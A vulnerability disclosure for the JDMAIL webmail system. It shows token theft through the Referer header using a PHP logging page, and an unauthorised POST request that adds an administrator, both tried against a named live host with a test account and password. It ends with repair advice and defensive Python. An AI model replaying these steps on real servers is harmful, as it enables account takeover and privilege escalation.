Jindi email system (JDMAIL): any user can be hijacked, and a system administrator can be added
JDMAIL
This email system has multiple high-risk vulnerabilities caused by design defects.
0x001 Arbitrary user hijacking
After login, the URL contains an 8- or 9-character string, such as 45e22a8H7.
This string is the login credential: with it, the account can be accessed directly, with no session or cookie verification.
This means that, as long as the user has not logged out, this URL alone is enough to log in to the system as that user.
Exploitation is very simple. Send an email to any user with a hyperlink in the message body; when the user clicks it, the receiving server records the Referer of the request, which contains the user's URL and therefore the credential, and the account can be hijacked.
The administrator can be hijacked the same way, by sending them a malicious email directly.
Alternatively, XSS can be used to hijack any user account.
Testing was done against http://mail.lyx928.com:8080.
Test user: test@dodole.net, weak password 111111.
After logging in, we send an email to this user:
A hyperlink is added to the message content:
The page behind this hyperlink contains:
<?php
// Append the Referer, client IP and time of each request to referer.txt
file_put_contents("referer.txt", " ref:".$_SERVER["HTTP_REFERER"], FILE_APPEND);
file_put_contents("referer.txt", " IP:".$_SERVER["REMOTE_ADDR"], FILE_APPEND);
file_put_contents("referer.txt", " Time:".date("Y.m.d H:i:s")."\r\n", FILE_APPEND);
?>
The captured Referer is written to referer.txt.
When test@dodole.net clicks the link, the Referer we receive is:
The Referer, and with it the authentication string in the URL, is obtained successfully.
Opening this URL in a different browser shows whether the login succeeds:
The login succeeds: hijacking the user is very easy!
0x002 Adding an administrator
There is an unauthorized operation (no permission check). After logging in as an ordinary user, an administrator user can be added directly:
Link: http://mail.lyx928.com:8080/tmw/45e22a8H7/mailmain?type=msaveuser
POST: subtype=new&username=test123&domain=dodole.net&usertype=S&departmentid=&first_name=test123&password=111111&encodetype=inner&enable=true&enable_smtp=true&enable_pop3=true&enable_imap4=true&enable_webaccess=true&alias=&expiredtime=&max_mailbox_size=-1&Records=-1&fm_size=-1&fm_upload_size=-2&sendmail_freq=&sendsms_freq=&sendmms_freq=&response=&default_language=SIMPLIFIED_CHINESE&telephone=&mobile=&postalcode=&country=&state_province=&city=&organization=&department=&address=
This adds the administrator user test123@dodole.net.
Vulnerability repair suggestions:
1. Strengthen verification of the user's login state
2. Strictly control user permissions
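As an added example (not JDMAIL's code and not part of the original report), the following Python models both defects from 0x001 and 0x002 with the corresponding fix beside each: a URL-only login check next to one that binds the URL token to a cookie issued to the same browser, and an unchecked msaveuser action next to one that verifies the caller's role on the server. The Session and USERS structures, the function names, the page_headers helper and the "U" user type are assumptions made here; only usertype=S and the msaveuser parameter names come from the page.

```python
# Added example (not JDMAIL's code): a minimal model of the two defects
# described on this page, each beside the server-side check that fixes it.
# Assumptions: the Session/USERS structures, the function names and the
# "U" user type are constructed here; only usertype=S (administrator) and
# the msaveuser parameter names come from the page.
import hmac
import secrets
from dataclasses import dataclass
from typing import Optional

# Constructed sample accounts: usertype "S" = system administrator (from the
# page's msaveuser request); "U" for an ordinary user is an assumption.
USERS = {"test@dodole.net": "U", "admin@dodole.net": "S"}


@dataclass
class Session:
    username: str
    url_token: str      # the 8/9-character segment JDMAIL places in the URL path
    cookie_secret: str  # separate random value that only travels in an HttpOnly cookie


SESSIONS: dict = {}  # url_token -> Session


def login(username: str) -> Session:
    """Issue a URL token (as JDMAIL does) plus a cookie secret bound to it."""
    session = Session(username, secrets.token_hex(4), secrets.token_hex(16))
    SESSIONS[session.url_token] = session
    return session


def logout(session: Session) -> None:
    """Invalidate the session server-side so a leaked token stops working."""
    SESSIONS.pop(session.url_token, None)


def authenticate_weak(url_token: str) -> Optional[Session]:
    """The behaviour the page describes: the URL string alone is the credential,
    so anyone who reads it from a Referer header is logged in as that user."""
    return SESSIONS.get(url_token)


def authenticate(url_token: str, cookie_secret: Optional[str]) -> Optional[Session]:
    """Hardened check (repair suggestion 1): the URL token is accepted only
    together with the cookie secret issued to the same browser, so a token
    leaked through Referer is useless on its own."""
    session = SESSIONS.get(url_token)
    if session is None or cookie_secret is None:
        return None
    if not hmac.compare_digest(session.cookie_secret.encode(), cookie_secret.encode()):
        return None
    return session


def page_headers() -> dict:
    """Response headers for every authenticated page: keep the token-bearing URL
    out of the Referer sent to external links, and out of shared caches."""
    return {"Referrer-Policy": "no-referrer", "Cache-Control": "no-store"}


def msaveuser(session: Optional[Session], params: dict):
    """Authorization for the msaveuser action (repair suggestion 2): the caller's
    role is read from the server-side account table, never from the request."""
    if session is None:
        return 401, "login required"
    if USERS.get(session.username) != "S":
        return 403, "only administrators may create accounts"
    if params.get("subtype") != "new" or not params.get("username") or not params.get("domain"):
        return 400, "bad request"
    USERS[f"{params['username']}@{params['domain']}"] = params.get("usertype", "U")
    return 200, "created"
```

The cookie secret is compared with hmac.compare_digest so the check takes the same time whether or not the value matches, and the role is looked up by the session's username rather than trusted from any request parameter, which is exactly what the msaveuser request on this page relies on being missing.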